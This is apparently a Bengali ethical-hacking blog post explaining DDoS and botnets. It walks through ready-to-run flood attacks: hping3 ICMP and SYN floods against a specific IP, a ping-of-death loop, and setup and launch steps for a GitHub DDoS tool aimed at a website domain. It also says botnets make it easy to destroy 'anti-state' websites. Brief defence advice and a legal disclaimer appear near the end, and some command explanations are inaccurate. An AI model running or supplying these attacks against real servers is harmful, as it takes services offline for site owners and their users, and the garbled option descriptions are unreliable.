DDoS (ডিডস) কাকে বলে?
ডিস্ট্রিবিউটেড ডিনায়েল অফ সার্ভিস বা ডিডস হলো মাল্টিপল ডিভাইস ইউজ করে একটি সেম টার্গেটে অ্যাটাক করা। ডস অ্যাটাক যেখানে একটি সিস্টেম ইউজ করে করা হয় কিংবা একজন হ্যাকার কাজটি করে, সেখানে ডিডস অ্যাটাকে অনেকগুলো ডিভাইস ইউজ করা হয়, বা কয়েকজন হ্যাকার মিলে কাজটা করে।
ধরুন আপনার একটি Business ওয়েবসাইট আছে। সেখানে আপনি বিভিন্ন পণ্য/সেবা বিক্রি করেন এবং অনেক কাস্টমার আপনার এই সার্ভিস ইউজ করে। এ কারনে উক্ত ওয়েবসাইট পরিচালনার জন্য আপনি অনেক বেশি স্পেস এবং ব্যান্ডউইথ সহ হোস্টিং কিনলেন। কোন কারনে আপনার ওয়েবসাইট কোন হ্যাকারের খারাপ নজরে এলো। সে যদি আপনার ওয়েবসাইট স্লো বা অফলাইন করে দিতে চায় তাহলে তাকে ডিডস অ্যাটাকের সাহায্য নিতে হবে। আর এভাবে ওয়েবসাইটটির ব্যান্ডউইথ নষ্ট করে দিয়ে ওয়েবসাইটটিকে সার্ভার থেকে বিচ্ছিন্ন করে ফেলে এবং কেউ ওয়েবসাইটটিতে আর ভিজিট করতে পারেনা।
BotNet/ বটনেট “ জম্বি নেটওয়ার্ক”?
এটা করার জন্য হ্যাকাররা বটনেট বা জম্বি নেটওয়ার্ক ব্যবহার করে, যার মাধ্যমে সহজেই একটি সার্ভারে অনেক সংখ্যক রিকোয়েস্ট পাঠানো যায়, জমি নেটওয়ার্ক একটি Infected ম্যালওয়্যার। বটনেট কনফিগারেশনের কারনে হ্যাকার রিমোটলি টার্গেট সেট করে উক্ত ডিভাইসকে আর্মি হিসেবে ইউজ করতে পারে।
তবে, সিঙ্গেল অ্যাটাকের থেকে বটনেট ইউজ করে অ্যাটাক পরিচালনা করলে একই সাথে গিগাবাইট থেকে টেরাবাইট ইন্টারনেট ট্র্যাফিক সেন্ড করা সম্ভব, যা ওয়েবসাইটের সমস্ত ব্যান্ডউইথ কে নষ্ট করে দিতে পারে। এধরণের শক্তিশালী অ্যাটাক প্রতিহত করাও অনেক কষ্টকর এবং ব্যায়বহুল হয়ে থাকে। বট নেট দিয়ে সমাজ/ রাষ্ট্র বিরোধী ওয়েবসাইটগুলো সহজে ধ্বংস করা যায়।
Before Attack Check Server Response Time
let’s check server response time : kali(cmd) ping www.minhazulasif.me
DDOS Ping ICMP FLOOD – Attck a Server USing hPing3
sudo hping3 -1 –flood 148.163.80.131
Try overwhelmed the server with multiple request and see the server response time
DDOS SYN FLOOD ATTACK
– Using TCP we connect with a server (say port is 80)
sudo hping3 -d 200 –flood 148.163.80.131
– d = packet (byte) –flood = huge request, p = port
Ping Of Death
> nslookup www.targetdomain.com
> get the ip address
> ping ip -t -n 10000 -w 1
Terms:
-t = Pings the specified host until stopped.
-l = buffer size
-n = Count Number of echo requests
-w 1 = wait of second for each reply
DDos Attack In Kali (RDDoS_Tool)
Github Link: https://github.com/Red-company/RDDoS_Tool
apt-get update -y
apt-get install git
git clone https://github.com/Red-company/RDDoS_Tool.git
cd RDDoS_Tool
bash setup.sh
python3 RDDoS_Tool.py
If there are troubles :
pip install tqdm
pip install pyfiglet
Then choose 1 for website attack & put the domain name
কিভাবে ডস বা ডিডস অ্যাটাক থেকে সুরক্ষিত থাকা যায়?
ডিডস অ্যাটাক থেকে সুরক্ষা পেতে অনেক গুলো পেইড এবং স্ট্রং ফায়ারওয়াল ব্যবহার করতে হবে। ছোট এবং মাঝারী অ্যাটাক প্রতিহত করার জন্য ফায়ারওয়াল সার্ভিস অনেক কার্যকর।
ফায়ারওয়াল এর মাধ্যমে, সিস্টেম থেকে অতিরিক্ত রিকোয়েস্ট বা ট্র্যাফিক আসতেছে তা সহজেই বের করা যায়। উক্ত আইপি ব্লক করে দিলেই অ্যাটাক বন্ধ হয়ে যায়। আর অনেকগুলো হ্যাকার যখন নির্দিষ্ট একটি নেটওয়ার্কে অ্যাটাক করে তখন সেই হ্যাকারদের লোকেশন বা কান্ট্রি ব্লক করে দিলে এই ধরনের অ্যাটাক থেকে সুরক্ষিত থাকা যায়।
এছাড়া বড় ধরনের অ্যাটাক প্রতিহত করার জন্য ক্লাউড নির্ভর সার্ভিস যেমন Cloudflare, Sucuri firewall, AWS Shield, Project Shield, Wordfence ইত্যাদি অনেক ভালো কাজ করে। সুতরাং ডিডস অ্যাটাক থেকে আপনার সার্ভিসকে সুরক্ষা দিতে চাইলে এসব সার্ভিস অবশ্যই ব্যবহার করবেন।
DDoS অ্যাটাক অবশ্য একটি শাস্তিযোগ্য অপরাধ, আমরা সবাই DDoS অ্যাটাক সম্পর্কে জানবো এবং নিজেদের সুরক্ষা নিশ্চিত করবো। কারো ক্ষতির জন্য এটি ব্যবহার করব না।
Check Firewall/ WAF exist in a site or not
in kali > wafw00f
> wafw00f -l (To see the waf list)
> wafw00f minhazulasif.me (To check filewall exist or not)
Read more bloghs on ethical hacking from here.
